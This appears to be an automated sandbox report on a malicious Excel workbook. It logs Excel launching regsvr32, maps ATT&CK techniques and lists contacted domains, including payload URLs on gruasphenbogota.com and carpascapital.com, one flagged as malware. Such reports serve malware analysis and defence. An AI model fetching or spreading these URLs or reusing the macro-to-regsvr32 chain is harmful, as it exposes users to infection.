Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: regsvr32.exe, 00000002.00000002.236210560.0000000002930000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000002.00000002.236210560.0000000002930000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: regsvr32.exe, 00000002.00000002.236210560.0000000002930000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: regsvr32.exe, 00000002.00000002.236210560.0000000002930000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
carpascapital.com2%VirustotalBrowse
gruasphenbogota.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://gruasphenbogota.com/C74hwGGxi/ka.html11%VirustotalBrowse
https://gruasphenbogota.com/C74hwGGxi/ka.html100%Avira URL Cloudmalware
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://carpascapital.com/gBPg8MtsGbv/ka.html%0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
carpascapital.com
50.116.92.246
truefalseunknown
gruasphenbogota.com
50.116.92.246
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
    high
    https://login.microsoftonline.com/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
      high
      https://shell.suite.office.com:144357891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
          high
          https://autodiscover-s.outlook.com/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
              high
              https://cdn.entity.57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                    high
                    https://powerlift.acompli.net57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v157891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                      high
                      https://cortana.ai57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                high
                                https://api.aadrm.com/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                      high
                                      https://cr.office.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                        high
                                        https://gruasphenbogota.com/C74hwGGxi/ka.htmlintlsheet1.bintrue
                                        • 11%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://portal.office.com/account/?ref=ClientMeControl57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                          high
                                          https://graph.ppe.windows.net57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplate57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplate57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetect57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                          high
                                                          https://graph.windows.net57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.json57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                  high
                                                                                  https://management.azure.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                    high
                                                                                    https://wus2.contentsync.57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://incidents.diagnostics.office.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                      high
                                                                                      https://clients.config.office.net/user/v1.0/ios57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                        high
                                                                                        https://insertmedia.bing.office.net/odc/insertmedia57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                          high
                                                                                          https://o365auditrealtimeingestion.manage.office.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com/api/v1.0/me/Activities57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                              high
                                                                                              https://api.office.net57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                high
                                                                                                https://incidents.diagnosticssdf.office.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                  high
                                                                                                  https://asgsmsproxyapi.azurewebsites.net/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://clients.config.office.net/user/v1.0/android/policies57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                    high
                                                                                                    https://entitlement.diagnostics.office.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                      high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                        high
                                                                                                        https://outlook.office.com/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                          high
                                                                                                          https://storage.live.com/clientlogs/uploadlocation57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                            high
                                                                                                            https://templatelogging.office.com/client/log57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office365.com/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                high
                                                                                                                https://webshell.suite.office.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                    high
                                                                                                                    https://carpascapital.com/gBPg8MtsGbv/ka.html%intlsheet1.binfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://management.azure.com/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                      high
                                                                                                                      https://login.windows.net/common/oauth2/authorize57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/imports57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus.pagecontentsync.57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v257891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://api.cortana.ai57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                50.116.92.246
                                                                                                                                                carpascapital.comUnited States
                                                                                                                                                46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:439554
                                                                                                                                                Start date:24.06.2021
                                                                                                                                                Start time:07:07:18
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 4m 56s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:plan-930205822.xlsb
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:29
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
